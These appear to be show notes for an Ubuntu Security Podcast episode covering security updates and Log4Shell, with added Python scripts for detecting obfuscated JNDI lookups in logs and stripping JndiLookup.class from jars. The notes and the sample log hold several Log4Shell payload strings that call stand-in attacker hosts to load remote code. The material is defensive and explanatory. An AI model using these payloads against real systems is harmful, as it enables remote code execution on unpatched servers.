Episode 142
Content provided by Alex Murray and Ubuntu Security Team. All podcast content (including episodes, graphics and podcast descriptions) is uploaded and provided directly by Alex Murray and Ubuntu Security Team or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined at https://zh.player.fm/legal.
Overview
Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.
This week in Ubuntu Security Updates
27 unique CVEs addressed
[USN-5183-1] BlueZ vulnerability [00:48]
- 1 CVE addressed in Bionic (18.04 LTS)
- Heap based buffer overflow when handling overly large SDP requests - crash / possible code execution as a result
[USN-5186-1] Firefox vulnerabilities [01:08]
- 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Updated to Firefox 95.0
[USN-5189-1] GLib vulnerability [01:34]
- 1 CVE addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
- By setting the GLIB_CHARSETALIAS_DIR env var, a local user could possibly abuse setuid binaries like pkexec which are linked against glib to read root-owned files - fixed by having glib no longer read and use this environment variable
[USN-5142-3] Samba regression [02:29]
- 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Episode 138, Episode 141 - yet another upstream regression in Samba due to the most recent set of security updates which we discussed a month ago in episode 138
[USN-5174-2] Samba regression
- 4 CVEs addressed in Bionic (18.04 LTS)
[USN-5191-1] Flatpak vulnerability [02:48]
- 1 CVE addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Possible to escape the flatpak sandbox by tricking services running on the host into believing they were not communicating with a flatpak-sandboxed application but with a regular unconfined one. As such they would not restrict the actions they perform on behalf of the flatpak’d application, which could then escape its own confinement
[USN-5193-1] X.Org X Server vulnerabilities [03:26]
- 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- 4 different out-of-bounds writes that could be triggered by X clients - could cause the X server to crash or possibly lead to code execution
- In more recent releases, X runs as a regular user so impact is limited, and in most recent releases Ubuntu uses Wayland by default so it’s possible that on modern desktops there is no X server running at all \o/
[USN-5192-1] Apache Log4j 2 vulnerability [04:12]
- 1 CVE addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
[USN-5197-1] Apache Log4j 2 vulnerability
- 1 CVE addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
Goings on in Ubuntu Security Community
Log4Shell explodes the internet [04:20]
- Vuln announced on Twitter late last Thursday / early Friday morning, linking to the upstream Github issue of a possible remote code execution vuln in Apache Log4j 2
- Quickly it became apparent this was a high profile vuln that would affect a huge number of software products and have wide reaching consequences
- Over the weekend started being picked up by mainstream news not just the security industry
- Since then vendors and distros etc have scrambled to patch the vulnerability
- Ubuntu released updates on Monday - 2.15.0 for Ubuntu >= 20.04 LTS, and otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1)
- Stepping back
- What is Log4j?
- Extremely popular and widely used Java package for doing logging within applications
- Is the 252nd most popular component in Maven Central repo by download volume for November 2021
- Top 0.003% in popularity by downloads
- Also is a dependency in close to 7000 other open source projects - is even in the Mars rover’s Ingenuity helicopter
- Is in most other ASF software products (Struts, Spark, Kafka, Solr etc)
- Plus a huge number of other projects:
- Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
- Initial reports were this was first seen being exploited in Minecraft
- Not to mention:
- Apple iCloud, Steam, Samsung Cloud storage and more
- What is the vulnerability?
- Vuln is in the JNDI (Java Naming and Directory Interface) feature of log4j
- JNDI allows Java objects to be referenced externally then loaded and used at runtime
- JNDI supports different protocols to fetch classes, including LDAP, even DNS etc
- Log4j supports lookups on variables which can encode a JNDI resource
- So if you log a string such as ${jndi:ldap://attacker.com/malware}, Log4j will perform the lookup via LDAP, retrieve the Java class referenced at that URI and then execute it - remote code execution attacks don’t get any easier than this, especially since Java is write once, run anywhere - there are none of the architecture-specific issues you get with natively compiled languages like C/C++
- As such wasn’t surprising to see this given the highest possible CVSS score of 10.0 by ASF
- How widespread is this issue?
- As mentioned earlier, so many different pieces of software use Log4j and have Log4j embedded within them that it is not sufficient to just update your Ubuntu-packaged version of log4j - if you are running custom / proprietary Java applications they likely contain their own copy of Log4j 2 and you may have to go and patch that directly
- How to patch manually?
- The easiest option would be to get an updated version of the application from the original vendor
- Failing that, could go looking for all log4j2 jar archives, extract these (jars are zips after all) and remove the offending class directly (org/apache/logging/log4j/core/lookup/JndiLookup.class)
- How is it being exploited?
- Everything from kids popping Minecraft servers to other adversaries using this for more traditional attacks like deploying cryptominers etc - but given how widespread this issue is and how much coverage it has gotten, it is likely everyone and anyone is looking to actively exploit it
- Expect we will still be hearing about this for a long time - whether due to more vulns in Log4j2 but also since there are so many devices running Java out there and that likely have Log4j as part of that - could be a long tail of devices which take a long time (or even never get patched)
- Could be the basis of the next Mirai style botnet of compromised devices?
- In all the drama, it turned out there was a second vuln which could still be triggered to cause at least a DoS or possible information leaking / exfiltration - so a second upstream release 2.16.0 was done - this is now in Ubuntu >= 20.04 LTS as well (USN-5197-1) - there is a KnowledgeBase article for this on the Ubuntu wiki too if you want more specific information
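The lookup behaviour described under “What is the vulnerability?” and the in-the-wild probing under “How is it being exploited?” above are what a detection rule has to catch, and plain substring matching on ${jndi: misses the nested ${lower:…} / ${::-…} / ${env:UNSET:-…} tricks attackers used from the first weekend. The script below is an added example, not code from the show notes, Ubuntu or the Log4j project: it collapses those nested lookups the way a vulnerable Log4j would, then reports the scheme and target host of each JNDI lookup. The access-log lines and hostnames are constructed placeholders.

```python
"""Flag Log4Shell lookup strings in log lines, de-obfuscating the common tricks first."""
import re

# Innermost ${...} whose body contains no further $, { or } characters.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A (de-obfuscated) JNDI lookup: ${jndi:<scheme>:[//]<authority>...
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/{0,2}([^/}\s]+)", re.IGNORECASE)


def _resolve(body):
    """Evaluate one nested Log4j lookup the way vulnerable versions would.

    Only the lookups attackers use to hide the word 'jndi' are handled:
      ${lower:X} / ${upper:X}                  -> X
      ${::-X}, ${env:UNSET:-X}, ${sys:UNSET:-X} -> the default text X
    Anything else, including the jndi lookup itself, is left as-is (None).
    """
    head = body.lower()
    if head.startswith(("lower:", "upper:")):
        return body.split(":", 1)[1]
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text):
    """Collapse nested obfuscation lookups until no more can be simplified."""
    while True:
        changed = False

        def _sub(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER.sub(_sub, text)
        if not changed:
            return text


def find_jndi(text):
    """Return (scheme, authority) for each JNDI lookup present after de-obfuscation."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(text))]


def scan_log(lines):
    """One record per line carrying a lookup: line number, target and the normalized text."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = find_jndi(line)
        if found:
            scheme, authority = found[0]
            hits.append({"line": number, "scheme": scheme, "authority": authority,
                         "normalized": normalize(line)})
    return hits


# Constructed access-log lines for demonstration; the hostnames are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:22:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:15:11 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example:1389/x}"',
    '198.51.100.2 - - [10/Dec/2021:22:16:40 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://callback.example/o} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Dec/2021:22:17:02 +0000] "POST /api HTTP/1.1" 200 20 "-" "${${env:NaN:-j}ndi:${env:NaN:-d}ns://probe.example/t}"',
    '203.0.113.5 - - [10/Dec/2021:22:18:00 +0000] "GET /docs/${version} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['authority']}")
```

The scheme and authority are the useful pivot: ldap/rmi targets are the attacker’s class-serving hosts, and dns targets are usually blind probes checking whether a lookup fired at all. Treat a hit as evidence of probing, not of compromise, and remember that a scanner cannot see obfuscations it does not model - the fix is still to patch or remove the class.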
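The manual mitigation under “How to patch manually?” above is a two-step job: find every archive that bundles log4j-core (including copies nested inside .war files, which the distro package update cannot reach), then delete JndiLookup.class from the jar. The script below is an added example, not Ubuntu’s or the Log4j project’s code. So that it runs offline it builds a constructed directory of stand-in jars with the real entry names but dummy class bytes; the directory layout, the 2.14.1 version string and the archive names are assumptions.

```python
"""Inventory log4j-core inside jar/war/ear files and strip JndiLookup.class from them."""
import io
import os
import shutil
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _inspect(zf, label):
    """Inventory records for one open archive plus any jars nested inside it."""
    records = []
    names = set(zf.namelist())
    if POM_PROPERTIES in names or JNDI_LOOKUP in names:
        version = None
        if POM_PROPERTIES in names:
            for raw in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if raw.startswith("version="):
                    version = raw.split("=", 1)[1].strip()
        records.append({"archive": label, "version": version,
                        "has_jndi_lookup": JNDI_LOOKUP in names})
    for name in names:
        if name.lower().endswith(".jar"):  # e.g. WEB-INF/lib/log4j-core-*.jar inside a .war
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    records.extend(_inspect(inner, f"{label}!{name}"))
            except zipfile.BadZipFile:
                pass
    return records


def inventory(root):
    """Walk root and list every log4j-core found in jar/war/ear/zip files (nested ones too)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if fn.lower().endswith(ARCHIVE_SUFFIXES) and zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    found.extend(_inspect(zf, path))
    return sorted(found, key=lambda rec: rec["archive"])


def strip_jndi_lookup(jar_path):
    """Rewrite jar_path without JndiLookup.class (keeping a .bak). True if the class was removed."""
    tmp_path = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        with zipfile.ZipFile(tmp_path, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))  # keeps the entry's compression
    shutil.copy2(jar_path, jar_path + ".bak")
    os.replace(tmp_path, jar_path)
    return True


def make_sample_jar(path, version="2.14.1", vulnerable=True):
    """Constructed stand-in for log4j-core: real entry names, dummy class bytes."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\n"
                                    f"artifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if vulnerable:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def build_sample_tree(root=None):
    """Constructed layout: an unrelated jar, a bundled log4j-core 2.14.1, and a war nesting it."""
    root = root or tempfile.mkdtemp(prefix="log4j-demo-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib, exist_ok=True)
    with zipfile.ZipFile(os.path.join(lib, "app.jar"), "w") as zf:
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
    core = os.path.join(lib, "log4j-core-2.14.1.jar")
    make_sample_jar(core, "2.14.1", vulnerable=True)
    with zipfile.ZipFile(os.path.join(root, "site.war"), "w") as war:
        war.write(core, "WEB-INF/lib/log4j-core-2.14.1.jar")
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for rec in inventory(demo_root):
        print("found", rec)
    for rec in inventory(demo_root):
        if rec["has_jndi_lookup"] and "!" not in rec["archive"]:
            print("stripped", rec["archive"], strip_jndi_lookup(rec["archive"]))
    for rec in inventory(demo_root):
        print("after", rec)
```

Two caveats a practitioner will hit: the copy nested inside the .war is only reported, not modified, so that application has to be rebuilt or redeployed with a fixed jar; and removing the class only takes effect once the JVM is restarted, since the vulnerable class is already loaded in a running process. Deleting JndiLookup also disables any legitimate ${jndi:…} lookups the application relied on, which is the trade-off of the class-removal approach versus upgrading to 2.16.0.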
Ubuntu Security Podcast Holiday specials [12:52]
- Camila Camargo de Matos (aka mossoctopus) compiled a great 2-part series on cyber security threats and preparations for the holidays
- Will be publishing that over the next couple weeks whilst the regular episodes take a break
Ubuntu Security Podcast on break [13:37]
- Will take a break for a few weeks and be back in early January
- Wishing all listeners a safe and happy time if you are celebrating the holidays - fingers crossed 🤞 there are no more Log4Shell type vulnerabilities that drop during that time and everyone can have a proper break to recharge before 2022
- We’ll be back then to bring you all the news for Ubuntu Security again
Get in contact